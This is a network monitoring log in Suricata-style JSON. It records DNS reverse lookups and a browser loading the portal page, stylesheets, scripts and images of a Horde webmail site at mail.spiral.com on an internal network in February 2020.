{"timestamp":"2020-02-29T00:19:47.053741+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39714,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:47.198540+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39715,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:19:47.309545+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39715,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:47.309545+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39715,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:47.847877+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8310}} {"timestamp":"2020-02-29T00:19:47.864664+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8310},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":49065,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.868234+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196}} {"timestamp":"2020-02-29T00:19:47.870387+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140}} {"timestamp":"2020-02-29T00:19:47.871903+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":222,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.873169+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201}} {"timestamp":"2020-02-29T00:19:47.875349+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":315,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.875779+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":488,"tx_id":3}} {"timestamp":"2020-02-29T00:19:47.901833+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} {"timestamp":"2020-02-29T00:19:47.901898+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:19:47.903351+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/turba\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":147,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.904158+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947}} {"timestamp":"2020-02-29T00:19:47.904960+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306}} {"timestamp":"2020-02-29T00:19:47.905891+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/js\/hordeblocks.js","state":"CLOSED","stored":false,"size":528,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.906159+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110}} {"timestamp":"2020-02-29T00:19:47.907508+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110},"app_proto":"http","fileinfo":{"filename":"\/js\/popup.js","state":"CLOSED","stored":false,"size":2903,"tx_id":3}} {"timestamp":"2020-02-29T00:19:47.907715+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297}} {"timestamp":"2020-02-29T00:19:47.907813+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180}} {"timestamp":"2020-02-29T00:19:47.910822+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538}} {"timestamp":"2020-02-29T00:19:47.911656+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180},"app_proto":"http","fileinfo":{"filename":"\/js\/topbar.js","state":"CLOSED","stored":false,"size":4199,"tx_id":4}} {"timestamp":"2020-02-29T00:19:47.914177+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/en-US.js","state":"CLOSED","stored":false,"size":6704,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.914713+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721}} {"timestamp":"2020-02-29T00:19:47.914589+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947},"app_proto":"http","fileinfo":{"filename":"\/js\/tooltips.js","state":"CLOSED","stored":false,"size":2555,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.921254+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641}} {"timestamp":"2020-02-29T00:19:47.923471+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":199,"tx_id":4}} {"timestamp":"2020-02-29T00:19:47.935410+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117}} {"timestamp":"2020-02-29T00:19:47.936027+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/effects.js","state":"CLOSED","stored":false,"size":38450,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.936336+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337}} {"timestamp":"2020-02-29T00:19:47.936171+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/date.js","state":"CLOSED","stored":false,"size":85570,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.936959+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:19:47.937801+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974}} {"timestamp":"2020-02-29T00:19:47.937896+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569}} {"timestamp":"2020-02-29T00:19:47.938574+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569},"app_proto":"http","fileinfo":{"filename":"\/turba\/js\/minisearch.js","state":"CLOSED","stored":false,"size":1408,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.939491+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105}} {"timestamp":"2020-02-29T00:19:47.938699+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52920,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538},"app_proto":"http","fileinfo":{"filename":"\/js\/growler.js","state":"CLOSED","stored":false,"size":8911,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.939371+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/sound.js","state":"CLOSED","stored":false,"size":2456,"tx_id":5}} {"timestamp":"2020-02-29T00:19:47.940311+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tabset.png","state":"CLOSED","stored":false,"size":105,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.941636+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116}} {"timestamp":"2020-02-29T00:19:47.942466+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52920,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new-bg.png","state":"CLOSED","stored":false,"size":116,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.942679+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logo.png","state":"CLOSED","stored":false,"size":2337,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.944777+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/head-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.944907+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117},"app_proto":"http","fileinfo":{"filename":"\/js\/hordecore.js","state":"CLOSED","stored":false,"size":25017,"tx_id":5}} 